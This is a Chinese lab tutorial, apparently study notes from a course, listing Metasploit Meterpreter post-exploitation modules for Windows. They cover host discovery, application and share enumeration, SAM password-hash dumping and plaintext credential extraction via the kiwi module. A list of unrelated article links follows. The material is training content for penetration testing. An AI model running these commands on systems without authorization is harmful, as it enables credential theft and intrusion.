当前位置: 首页 > news >正文

12.6、后渗透测试--Windows系统下信息收集模块

一、存活主机发现

步骤1、使用arp查看缓冲表:
meterpreter > arp
步骤2、局域网内存活主机发现:
meterpreter >  run post/windows/gather/arp_scanner RHOSTS=172.16.0.0/24

二、应用程序枚举

方法1:  获取靶机上的软件安装信息
meterpreter > run post/windows/gather/enum_applications
靶机上安装百度网盘应用后再检测:
方法2:  获取靶机最近访问过的文档、链接等信息
meterpreter >  run post/windows/gather/dumplinks

三、查看最近登录的用户

meterpreter > run post/windows/gather/enum_logged_on_users
  

四、查看共享文件

靶机上查看共享:
kail攻击机上: meterpret >  run post/windows/gather/enum_shares

五、查看用户hash

机制:从SAM数据库导出密码的哈希
方法1: hashdump
方法2: meterpreter > run post/windows/gather/hashdump

 得到用户的密码与对应的hash值。

六、查看usb历史记录

meterpreter > run post/windows/gather/usb_history
没有usb设备使用记录。
给靶机添加一个usb设备:
此时,再查看usb历史记录:

七、获取用户明文认证信息

加载模块: meterpret > load kiwi
查看指令集: help
获取所有认证信息 :creds_all

八、参考

4-30 后渗透测试实验 - 主机敏感信息泄露防御_哔哩哔哩_bilibili

4-31 Windows系统后渗透测试常用模块 - 主机发现_哔哩哔哩_bilibili

4-32 Windows系统后渗透测试常用模块 - 应用程序枚举_哔哩哔哩_bilibili

4-33 Windows系统后渗透测试常用模块 - 收集信息_哔哩哔哩_bilibili

4-35 Windows后渗透测试插件-获取用户明文认证信息_哔哩哔哩_bilibili

相关文章:

  • 含参PDE(偏微分方程)的神经网络并行编程mpi4py
  • C/C++程序的断点调试 - Visual Studio Code
  • 墨家在中国为什么消失得这么彻底?
  • 面试必备:分库分表经典15连问
  • 微信支付-全面详解(学习总结---从入门到深化)
  • 【MySQL】数据库基础知识汇总和增删改查操作
  • 【云计算与大数据技术】文件存储格式行式、列式、GFS、HDFS的讲解(图文解释 超详细)
  • 股票l2接口的委托数据有什么作用?
  • 人工智能:智能语音技术应用场景介绍
  • JSP ssh流量充值系统myeclipse开发oracle数据库MVC模式java编程计算机网页设计
  • [附源码]Python计算机毕业设计非处方药的查询与推荐系统Django(程序+LW)
  • 简洁而优美的结构 - 并查集 | 一文吃透 “带权并查集” 不同应用场景 | “手撕” 蓝桥杯A组J题 - 推导部分和
  • 12月13日(第11天)
  • 【华为机试真题详解】优选核酸检测点【2022 Q4 | 100分】
  • 浅谈责任链设计模式在框架源码中的运用
  • python3.6+scrapy+mysql 爬虫实战
  • 【每日笔记】【Go学习笔记】2019-01-10 codis proxy处理流程
  • Android交互
  • Linux编程学习笔记 | Linux多线程学习[2] - 线程的同步
  • ng6--错误信息小结(持续更新)
  • Terraform入门 - 1. 安装Terraform
  • Traffic-Sign Detection and Classification in the Wild 论文笔记
  • 构造函数(constructor)与原型链(prototype)关系
  • 面试题:给你个id,去拿到name,多叉树遍历
  • 七牛云假注销小指南
  • 微信开源mars源码分析1—上层samples分析
  • 国内开源镜像站点
  • 通过调用文摘列表API获取文摘
  • 小白应该如何快速入门阿里云服务器,新手使用ECS的方法 ...
  • # 深度解析 Socket 与 WebSocket:原理、区别与应用
  • (2009.11版)《网络管理员考试 考前冲刺预测卷及考点解析》复习重点
  • (八)Spring源码解析:Spring MVC
  • (附源码)计算机毕业设计ssm高校《大学语文》课程作业在线管理系统
  • (附源码)计算机毕业设计SSM基于java的云顶博客系统
  • (汇总)os模块以及shutil模块对文件的操作
  • (论文阅读40-45)图像描述1
  • (免费领源码)Java#Springboot#mysql农产品销售管理系统47627-计算机毕业设计项目选题推荐
  • (幽默漫画)有个程序员老公,是怎样的体验?
  • (转)Mysql的优化设置
  • (转)nsfocus-绿盟科技笔试题目
  • .NET 6 在已知拓扑路径的情况下使用 Dijkstra,A*算法搜索最短路径
  • .Net 6.0 处理跨域的方式
  • .net 7 上传文件踩坑
  • .NET Core 项目指定SDK版本
  • .NET运行机制
  • /usr/local/nginx/logs/nginx.pid failed (2: No such file or directory)
  • @modelattribute注解用postman测试怎么传参_接口测试之问题挖掘
  • [ web基础篇 ] Burp Suite 爆破 Basic 认证密码
  • [AutoSar NVM] 存储架构
  • [BZOJ] 2006: [NOI2010]超级钢琴
  • [element-ui] el-dialog 中的内容没有预先加载,因此无法获得内部元素的ref 的解决方案
  • [iOS]-NSTimer与循环引用的理解
  • [JavaEE]线程的状态与安全
  • [Jquery] 实现鼠标移到某个对象,在旁边显示层。
  • [mysql]游标和触发器